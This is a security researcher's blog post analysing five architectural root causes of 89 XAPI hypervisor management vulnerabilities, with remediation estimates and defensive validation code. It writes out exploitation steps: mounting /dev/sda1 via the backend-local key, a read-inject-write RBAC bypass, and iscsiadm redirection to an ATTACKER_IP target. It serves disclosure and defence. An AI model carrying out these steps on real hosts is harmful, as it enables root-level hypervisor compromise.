blog.moksha.dk

Personal blog by Jakob Wolffhechel

5 architectural root causes

Why 89 independently exploitable vulnerabilities exist in one management stack
Engineering analysis for remediation planning · Jakob Wolffhechel, Moksha

The landing page documents what the 89 vulnerabilities are. This page explains why they exist. Five architectural patterns in the XAPI codebase, each independently sufficient to produce exploitable findings, combine to create the attack surface documented in the full disclosure.

These are not five bugs. They are five classes of missing security engineering. Fixing any one class in isolation leaves the others exploitable. Complete remediation requires addressing all five.

1. Missing map_keys_roles on writable Map fields

XAPI's data model uses Map(String, String) fields on every major object type as extensible key-value stores. The RBAC system provides a mechanism called map_keys_roles to restrict write access to specific keys within these maps - for example, allowing vm-admin to write UI metadata keys while restricting infrastructure-critical keys to pool-admin.

The mechanism exists. It was never populated.

Across 8 XAPI object types and 18 writable map fields, the vast majority of map_keys_roles annotations are empty. Infrastructure-critical keys - keys that control storage backends, host device mounts, network bridge configuration, iSCSI target addresses, QEMU device parameters - are writable by the lowest delegated management role (vm-admin) with no per-key restriction.

The gap:

datamodel.ml field definition:
  field ~ty:(Map (String, String))
    ~map_keys_roles:[]     ← EMPTY - no per-key RBAC
    "other_config" "additional configuration"

Result: vm-admin can write any key via add_to_other_config
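
The effect of an empty annotation can be modelled in a few lines. This is a minimal sketch, not XAPI code: the role ordering follows the standard XAPI role hierarchy, while the key table, the default role and the function name may_write_key are assumptions made for illustration.

```python
# Hypothetical model of per-key RBAC on a Map(String, String) field.
# Higher rank means more privilege.
ROLE_RANK = {
    "read-only": 0,
    "vm-operator": 1,
    "vm-admin": 2,
    "vm-power-admin": 3,
    "pool-operator": 4,
    "pool-admin": 5,
}

# Assumed annotation for VBD.other_config: key -> minimum role allowed to write it.
VBD_OTHER_CONFIG_KEY_ROLES = {
    "backend-local": "pool-admin",
    "backend-kind": "pool-admin",
}

# Assumed role required for keys that have no explicit entry.
DEFAULT_KEY_ROLE = "vm-admin"


def may_write_key(caller_role, key, key_roles, default_role=DEFAULT_KEY_ROLE):
    """Return True if caller_role is allowed to write `key` under `key_roles`."""
    required = key_roles.get(key, default_role)
    return ROLE_RANK[caller_role] >= ROLE_RANK[required]


# With an empty annotation every key falls through to the default role.
print(may_write_key("vm-admin", "backend-local", {}))
# With a populated annotation the same write is refused.
print(may_write_key("vm-admin", "backend-local", VBD_OTHER_CONFIG_KEY_ROLES))
```

Passing an empty table reproduces the gap: every key, including backend-local, is governed only by the default role.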

Scale of the gap

Object type	Field	map_keys_roles entries	Infrastructure keys writable by vm-admin
VBD	other_config	0	backend-local, backend-kind, owner, task_id
VDI	sm_config	0	vhd-parent, vdi_type, paused, activating
VM	other_config	3 (UI only)	is_system_domain, storage_driver_domain, mac_seed
VM	platform	0	hvm_serial, parallel, pci_emulation
VM	xenstore_data	0	FIST/, vm-data/ (unlimited)
VIF	other_config	0	promiscuous, mtu, ethtool-*
VDI	other_config	2 (UI only)	mem-pool, content_id, maps_to, leaf-coalesce
VDI	xenstore_data	0	All keys (unlimited)

Demonstrated by: MOKSHA-2026-0001 (BOC-1), MOKSHA-2026-0002 (SMC-1), MOKSHA-2026-0003 (VOC-1), and 60+ additional findings across all object types.

2. set_other_config RBAC bypass (ARCH-2)

Even where map_keys_roles entries exist, they are bypassable. The set_other_config method (and equivalents like set_sm_config, set_platform) replaces the entire map atomically. The XAPI RBAC engine checks the caller's permission to invoke the set_* method, but it does not check whether individual keys in the new map would require higher privileges under map_keys_roles.

The bypass:

1. Read current map: VM.get_other_config(vm) → {key1: val1, key2: val2}
2. Add protected key: map["is_system_domain"] = "true"
3. Write entire map: VM.set_other_config(vm, map)

map_keys_roles check: SKIPPED (set_* replaces atomically)
Role check: passes (vm-admin has permission to call set_other_config)

Result: protected key written despite map_keys_roles restriction

This means that adding map_keys_roles entries (Root Cause 1 fix) is necessary but not sufficient. Without also fixing the set_* bypass, every RBAC annotation can be circumvented by a caller who reads the current map, injects the protected key, and writes the whole map back.
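
One way to close the bypass is to diff the old and new maps and apply the per-key check to every key that changed. The sketch below shows that idea under stated assumptions: the function names, the default role and the annotation on is_system_domain are hypothetical, and the real check would live in the XAPI RBAC layer rather than in Python.

```python
# Role ordering follows the XAPI role hierarchy; higher rank means more privilege.
ROLE_RANK = {
    "read-only": 0,
    "vm-operator": 1,
    "vm-admin": 2,
    "vm-power-admin": 3,
    "pool-operator": 4,
    "pool-admin": 5,
}


def changed_keys(old, new):
    """Keys that the replacement adds, removes, or gives a different value."""
    return {k for k in old.keys() | new.keys() if old.get(k) != new.get(k)}


def denied_keys(caller_role, old, new, key_roles, default_role="vm-admin"):
    """Return the sorted changed keys that caller_role is not allowed to write."""
    denied = []
    for key in sorted(changed_keys(old, new)):
        required = key_roles.get(key, default_role)
        if ROLE_RANK[caller_role] < ROLE_RANK[required]:
            denied.append(key)
    return denied


# Assumed annotation: is_system_domain restricted to pool-admin.
key_roles = {"is_system_domain": "pool-admin"}
old_map = {"folder": "/prod"}
new_map = dict(old_map, is_system_domain="true")

# A set_* call would be rejected whenever this list is non-empty.
print(denied_keys("vm-admin", old_map, new_map, key_roles))
```

Only changed keys are checked, so a caller who writes back a map that already contains a protected key, unmodified, is not penalised for a value they did not touch.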

Demonstrated by: MOKSHA-2026-0055 (VOC-5: set_other_config RBAC bypass for PCI passthrough key). Applies to all 18 map fields across all 8 object types.

3. No input validation at consumer code paths

Values written to map fields flow from the XAPI database to backend consumers - xenopsd, SM storage drivers, network scripts, blktap2, QEMU - without any validation at the consumption point. The consumer code assumes all values originate from a trusted source, but the API allows untrusted writes.

The flow (BOC-1 example):

1. vm-admin writes: VBD.add_to_other_config(vbd, "backend-local", "/dev/sda1")
2. XAPI stores value in database     ← no validation
3. On VM start, xapi_xenops.ml:backend_of_vbd reads the key
4. Value passed to xenopsd as VBD backend path     ← no validation
5. xenopsd writes path to xenstore
6. blkback opens /dev/sda1 in dom0     ← host root filesystem exposed
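
A check at step 3 or 4 would be enough to stop this flow. The following is a sketch of an allowlist check on the backend path; the allowed prefix and the function name validate_backend_path are assumptions, and the check is string-level only (a production version would also need to resolve symlinks on the host).

```python
import posixpath

# Assumed allowlist of directories a VBD backend may be served from.
# Placeholder value; the real set depends on the SR types in use.
ALLOWED_BACKEND_PREFIXES = ("/dev/sm/backend/",)


def validate_backend_path(path):
    """Return the normalised path if it is under an allowed prefix, else raise ValueError."""
    if not path.startswith("/"):
        raise ValueError("backend path must be absolute: %r" % path)
    # Collapse "." and ".." segments so traversal cannot escape the prefix.
    normalised = posixpath.normpath(path)
    if not any(normalised.startswith(prefix) for prefix in ALLOWED_BACKEND_PREFIXES):
        raise ValueError("backend path outside allowed prefixes: %r" % path)
    return normalised


for candidate in ("/dev/sm/backend/sr1/vdi1", "/dev/sda1", "/dev/sm/backend/../../sda1"):
    try:
        print("accepted", validate_backend_path(candidate))
    except ValueError as exc:
        print("rejected", exc)
```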

The flow (PDC-1 example):

1. pool-operator writes: SR.create(device_config={target: "ATTACKER_IP"})
2. PBD stored with attacker-controlled values ← no validation
3. On PBD.plug, BaseISCSI.load() reads device_config
4. iscsiadm -m discovery -t sendtargets -p ATTACKER_IP ← no validation
5. Hypervisor connects to attacker-controlled iSCSI target
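
The same idea applies before step 4. This sketch validates the target against a list of storage networks before any discovery command is built. The network list and the function name are assumptions (the range shown is a documentation range, not a real deployment), and it deliberately accepts only literal IP addresses.

```python
import ipaddress

# Assumed storage networks for the pool; placeholder documentation range.
ALLOWED_STORAGE_NETWORKS = [ipaddress.ip_network("192.0.2.0/24")]


def validate_iscsi_target(target, allowed=ALLOWED_STORAGE_NETWORKS):
    """Return the target as an ip_address object if it is inside an allowed network.

    Raises ValueError for anything that is not a literal IP address or that
    falls outside every allowed network.
    """
    addr = ipaddress.ip_address(target)  # ValueError for hostnames, flags, garbage
    if not any(addr in net for net in allowed):
        raise ValueError("iSCSI target %s is outside the allowed storage networks" % addr)
    return addr


for candidate in ("192.0.2.10", "203.0.113.5", "ATTACKER_IP"):
    try:
        print("accepted", validate_iscsi_target(candidate))
    except ValueError as exc:
        print("rejected", exc)
```

Rejecting hostnames is a design choice in this sketch: it keeps DNS out of the trust decision, at the cost of requiring targets to be configured by address.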

The pattern repeats across every consumer: QEMU serial output (hvm_serial with file: prefix), NFS mount commands (server/serverpath), OVS bridge configuration (fail_mode), ionice scheduling (class/sched), tapdisk memory pools (mem-pool). In every case, the value written by the API caller is passed directly to a privileged operation without sanitisation.

Demonstrated by: MOKSHA-2026-0001 (BOC-1: host device mount), MOKSHA-2026-0004 (PDC-1: iSCSI target redirection), MOKSHA-2026-0009 (PLAT-6: QEMU serial host filesystem write), MOKSHA-2026-0005 (PDC-2: NFS server redirection).

4. No security-level logging on sensitive writes

When a vm-admin writes backend-local=/dev/sda1 to a VBD - the single API call that grants root-equivalent access to the hypervisor host - XAPI produces a warn-level log message: "Using local override for VBD backend." No security alert. No RBAC denial event. No anomaly trigger. The message is buried in the general XAPI log alongside routine operational noise.

This is not a logging gap on an obscure code path. This is the only indicator that the most critical vulnerability in the audit (CVSS 9.9) has been exploited. And it is a warning, not an error.

The pattern extends across the codebase:

- SM driver operations triggered by injected sm_config values produce standard storage log messages indistinguishable from normal I/O
- PBD.device_config modifications that redirect storage connections generate no log entry at the XAPI layer
- Network configuration changes via Network.other_config produce no OVS-specific security event
- Xenstore writes via VM.xenstore_data are not logged at all

An operator with access to every log on the system cannot reliably distinguish a BOC-1 exploitation from a normal VM start operation. Post-compromise forensics depends entirely on the attacker not removing the backend-local key after use, and removing it takes only one additional API call.
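
What a security-level signal could look like is sketched below: a structured event emitted at the moment a sensitive key is written, so that detection does not depend on the key still being present later. The logger name, the event fields and the set of sensitive keys are all assumptions for illustration; XAPI itself has no such function.

```python
import json
import logging

# Assumed set of (object type, field, key) triples that warrant a security event.
SENSITIVE_KEYS = {
    ("VBD", "other_config", "backend-local"),
    ("VM", "platform", "hvm_serial"),
}

# Hypothetical dedicated logger, kept separate from the general operational log.
security_log = logging.getLogger("xapi.security")


def audit_map_write(obj_type, field, key, value, caller, role):
    """Emit a structured event for a sensitive key write.

    Returns the event dict, or None if the key is not considered sensitive.
    """
    if (obj_type, field, key) not in SENSITIVE_KEYS:
        return None
    event = {
        "event": "sensitive_map_write",
        "object": obj_type,
        "field": field,
        "key": key,
        "value": value,
        "caller": caller,
        "role": role,
    }
    # One JSON object per line so a SIEM can parse it without regexes.
    security_log.critical(json.dumps(event, sort_keys=True))
    return event


audit_map_write("VBD", "other_config", "backend-local", "/dev/sda1", "alice", "vm-admin")
```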

Demonstrated by: MOKSHA-2026-0001 (BOC-1: warn-level only). The detection rules (74 across 5 categories) exist specifically because the native logging does not provide the signals needed to detect exploitation.

5. Transitive trust in device_config and SM driver parameters

Storage connection parameters - iSCSI target addresses, NFS server hostnames, CHAP credentials, block device paths, mount options - flow from the XAPI database through SM drivers to kernel-level storage operations. The SM drivers treat all values from PBD.device_config and VDI.sm_config as trusted input from an administrator.

This trust assumption is incorrect. XAPI allows pool-operator (and, via BOC-1, vm-admin) to write arbitrary values into these fields. The SM driver code - BaseISCSI.py, NFSSR.py, blktap2.py - has no independent validation layer. It reads the database value and passes it to iscsiadm, mount.nfs, or tap-ctl as a subprocess argument.

The trust chain:

XAPI database (untrusted writes allowed)
  ↓
SM driver (reads values, assumes trusted)     ← no independent validation
  ↓
Subprocess call (iscsiadm / mount.nfs / tap-ctl)
  ↓
Kernel storage operation (iSCSI login / NFS mount / block device open)

The hypervisor becomes a proxy for attacker-controlled storage commands.
Traffic is indistinguishable from normal storage I/O at the array.
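
An independent validation layer in the driver would sit between the second and third step of that chain. The sketch below validates NFS parameters and only then builds the argument list for mount.nfs. The patterns, the option allowlist and the function name are assumptions, not the SM drivers' actual code, and the mount point is taken to be generated by the driver rather than supplied by the caller.

```python
import re

# Conservative patterns: no whitespace, no leading "-", no shell metacharacters.
HOSTNAME_RE = re.compile(r"[A-Za-z0-9]([A-Za-z0-9.-]{0,252}[A-Za-z0-9])?")
EXPORT_PATH_RE = re.compile(r"/[A-Za-z0-9._/-]*")

# Assumed allowlist of mount options the driver is willing to pass through.
ALLOWED_NFS_OPTIONS = {"soft", "hard", "tcp", "udp", "noac"}


def build_nfs_mount_argv(server, serverpath, options, mountpoint):
    """Validate NFS parameters and return an argv list for mount.nfs.

    Raises ValueError instead of building a command from unvalidated input.
    """
    if not HOSTNAME_RE.fullmatch(server):
        raise ValueError("invalid NFS server: %r" % server)
    if not EXPORT_PATH_RE.fullmatch(serverpath) or ".." in serverpath.split("/"):
        raise ValueError("invalid NFS export path: %r" % serverpath)
    rejected = [opt for opt in options if opt not in ALLOWED_NFS_OPTIONS]
    if rejected:
        raise ValueError("mount options not allowed: %r" % rejected)
    argv = ["mount.nfs", "%s:%s" % (server, serverpath), mountpoint]
    if options:
        argv += ["-o", ",".join(options)]
    return argv


print(build_nfs_mount_argv("nfs1.example.net", "/export/sr", ["tcp", "soft"], "/run/sr-mount/x"))
```

Returning an argument list rather than a command string means the result can be handed to subprocess.run without a shell, which removes one more place where an injected value could be reinterpreted.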

This is why SMC-1 and PDC-1/PDC-2 are classified as multi-vendor findings. The hypervisor silently forwards attacker-controlled commands to storage arrays that have no way to distinguish them from legitimate operations. NetApp, Dell EMC, Pure Storage, HPE, and any other storage vendor connected to an XAPI-managed host are in the transitive blast radius - not because their products are vulnerable, but because the hypervisor they trust to send valid commands does not validate those commands.

Demonstrated by: MOKSHA-2026-0002 (SMC-1: storage protocol injection), MOKSHA-2026-0004 (PDC-1: iSCSI target redirection), MOKSHA-2026-0005 (PDC-2: NFS server redirection), MOKSHA-2026-0024 (PDC-3: NFS mount option injection).

Remediation scope

Addressing all 89 findings requires fixing all five root causes. The fixes are not architecturally invasive:

Root cause	Fix	Scope
1. Missing map_keys_roles	Populate annotations in datamodel.ml	~50 lines of OCaml across 18 field definitions
2. set_* RBAC bypass	Diff old/new map, check per-key roles on changed keys	~30 lines in message_forwarding.ml
3. No consumer validation	Add validation at each consumption point	~100 lines across 6 consumer modules
4. No security logging	Elevate to security-level log, add structured events	~20 lines per consumer
5. Transitive trust	Add input validation in SM drivers before subprocess calls	~50 lines per driver (BaseISCSI, NFSSR, blktap2)

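The OCaml side of the upstream patch set is approximately 200 lines, in line with the estimates for root causes 1 to 3 above; the SM driver changes are Python and are scoped per driver. The fix is not an architectural rewrite. It is the input validation that should have been written when the fields were first defined.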

19 formal patch proposals covering all 5 root causes are documented in the research repository.

Jakob Wolffhechel · Moksha · Copenhagen · jakob@wolffhechel.dk · +45 3170 7337